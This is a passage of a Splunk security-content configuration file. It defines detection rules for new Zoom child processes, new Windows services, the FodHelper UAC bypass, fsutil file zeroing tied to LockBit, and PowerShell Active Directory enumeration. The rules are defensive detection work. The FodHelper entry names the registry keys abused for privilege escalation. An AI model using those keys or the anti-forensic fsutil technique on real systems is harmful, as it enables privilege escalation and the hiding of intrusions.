zoom.us which has not been previously on host $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - First Time Seen Child Process of Zoom - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Zoom Child Processes"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime values(Processes.parent_process_name) as parent_process_name values(Processes.parent_process_id) as parent_process_id values(Processes.process_name) as process_name values(Processes.process) as process from datamodel=Endpoint.Processes where (Processes.parent_process_name=zoom.exe OR Processes.parent_process_name=zoom.us) by Processes.process_id Processes.dest | `drop_dm_object_name(Processes)` | lookup zoom_first_time_child_process dest as dest process_name as process_name OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), "`previously_seen_zoom_child_processes_window`") | `security_content_ctime(firstTime)` | table firstTime dest, process_id, process_name, parent_process_id, parent_process_name |`first_time_seen_child_process_of_zoom_filter` [ESCU - First Time Seen Running Windows Service - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for the first and last time a Windows service is seen running in your environment. This table is then cached. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for the first and last time a Windows service is seen running in your environment. This table is then cached. action.escu.how_to_implement = While this search does not require you to adhere to Splunk CIM, you must be ingesting your Windows system event logs in order for this search to execute successfully. You should run the baseline search `Previously Seen Running Windows Services - Initial` to build the initial table of child processes and hostnames for this search to work. You should also schedule at the same interval as this search the second baseline search `Previously Seen Running Windows Services - Update` to keep this table up to date and to age out old Windows Services. Please update the `previously_seen_windows_services_window` macro to adjust the time window. Please ensure that the Splunk Add-on for Microsoft Windows is version 8.0.0 or above. action.escu.known_false_positives = A previously unseen service is not necessarily malicious. Verify that the service is legitimate and that was installed by a legitimate process. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - First Time Seen Running Windows Service - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Windows Service Abuse", "Orangeworm Attack Group", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - First Time Seen Running Windows Service - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Service Abuse", "Orangeworm Attack Group", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_system` EventCode=7036 | rex field=Message "The (?[-\(\)\s\w]+) service entered the (?\w+) state" | where state="running" | lookup previously_seen_running_windows_services service as service OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), `previously_seen_windows_services_window`) | table _time dest service | `first_time_seen_running_windows_service_filter` [ESCU - FodHelper UAC Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = Fodhelper.exe has a known UAC bypass as it attempts to look for specific registry keys upon execution, that do not exist. Therefore, an attacker can write its malicious commands in these registry keys to be executed by fodhelper.exe with the highest privilege. \ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command`\ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute`\ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command\(default)`\ Upon triage, fodhelper.exe will have a child process and read access will occur on the registry keys. Isolate the endpoint and review parallel processes for additional behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112", "T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Fodhelper.exe has a known UAC bypass as it attempts to look for specific registry keys upon execution, that do not exist. Therefore, an attacker can write its malicious commands in these registry keys to be executed by fodhelper.exe with the highest privilege. \ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command`\ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute`\ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command\(default)`\ Upon triage, fodhelper.exe will have a child process and read access will occur on the registry keys. Isolate the endpoint and review parallel processes for additional behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited to no false positives are expected. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - FodHelper UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "IcedID"] action.risk = 1 action.risk.param._risk_message = Suspcious registy keys added by process fodhelper.exe (process_id- $process_id), with a parent_process of $parent_process_name$ that has been executed on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - FodHelper UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "IcedID"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112", "T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Fodhelper.exe has a known UAC bypass as it attempts to look for specific registry keys upon execution, that do not exist. Therefore, an attacker can write its malicious commands in these registry keys to be executed by fodhelper.exe with the highest privilege. \ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command`\ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute`\ 1. `HKCU:\Software\Classes\ms-settings\shell\open\command\(default)`\ Upon triage, fodhelper.exe will have a child process and read access will occur on the registry keys. Isolate the endpoint and review parallel processes for additional behavior. action.notable.param.rule_title = FodHelper UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=fodhelper.exe by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `fodhelper_uac_bypass_filter` [ESCU - Fsutil Zeroing File - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious fsutil process to zeroing a target file. This technique was seen in lockbit ransomware where it tries to zero out its malware path as part of its defense evasion after encrypting the compromised host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious fsutil process to zeroing a target file. This technique was seen in lockbit ransomware where it tries to zero out its malware path as part of its defense evasion after encrypting the compromised host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-11 action.escu.modification_date = 2021-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Fsutil Zeroing File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = Possible file data deletion on $dest$ using $process$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Fsutil Zeroing File - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious fsutil process to zeroing a target file. This technique was seen in lockbit ransomware where it tries to zero out its malware path as part of its defense evasion after encrypting the compromised host. action.notable.param.rule_title = Fsutil Zeroing File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe Processes.process="*setzerodata*" by Processes.user Processes.process_name Processes.parent_process_name Processes.dest Processes.process Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `fsutil_zeroing_file_filter` [ESCU - Get ADDefaultDomainPasswordPolicy with Powershell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` executing the Get-ADDefaultDomainPasswordPolicy commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` executing the Get-ADDefaultDomainPasswordPolicy commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-26 action.escu.modification_date = 2021-08-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADDefaultDomainPasswordPolicy*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_addefaultdomainpasswordpolicy_with_powershell_filter` [ESCU - Get ADDefaultDomainPasswordPolicy with Powershell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADDefaultDomainPasswordPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADDefaultDomainPasswordPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get ADDefaultDomainPasswordPolicy with Powershell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText ="*Get-ADDefaultDomainPasswordPolicy*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_addefaultdomainpasswordpolicy_with_powershell_script_block_filter` [ESCU - Get ADUser with PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. The `Get-AdUser' commandlet returns a list of all domain users. Red Teams and adversaries alike may use this commandlet to identify remote systems for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments utilized to enumerate domain users. The `Get-AdUser' commandlet returns a list of all domain users. Red Teams and adversaries alike may use this commandlet to identify remote systems for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get ADUser with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get ADUser with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUser*" AND Processes.process = "*-filter*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduser_with_powershell_filter` [ESCU - Get ADUser with PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGUser` commandlet. The `Get-AdUser` commandlet is used to return a list of all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-AdGUser` commandlet. The `Get-AdUser` commandlet is used to return a list of all domain users. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get ADUser with PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get ADUser with PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*get-aduser*" ScriptBlockText = "*-filter*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduser_with_powershell_script_block_filter` [ESCU - Get ADUserResultantPasswordPolicy with Powershell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` executing the Get ADUserResultantPasswordPolicy commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` executing the Get ADUserResultantPasswordPolicy commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get ADUserResultantPasswordPolicy with Powershell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get ADUserResultantPasswordPolicy with Powershell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` executing the Get ADUserResultantPasswordPolicy commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get ADUserResultantPasswordPolicy with Powershell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmd.exe" OR Processes.process_name="powershell*") AND Processes.process = "*Get-ADUserResultantPasswordPolicy*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduserresultantpasswordpolicy_with_powershell_filter` [ESCU - Get ADUserResultantPasswordPolicy with Powershell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUserResultantPasswordPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUserResultantPasswordPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The following Hunting analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Get ADUserResultantPasswordPolicy with Powershell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = powershell process having commandline to query domain user password policy detected on host - $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Get ADUserResultantPasswordPolicy with Powershell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUserResultantPasswordPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Get ADUserResultantPasswordPolicy with Powershell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText="*Get-ADUserResultantPasswordPolicy*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `get_aduserresultantpasswordpolicy_with_powershell_script_block_filter` [ESCU - Get DomainPolicy with Powershell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` executing the `Get-DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` executing the `Get-DomainPolicy` commandlet used to obtain the password policy in a Windows domain. Red Teams and adversaries alike may use PowerShell to enumerate domain policies for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the 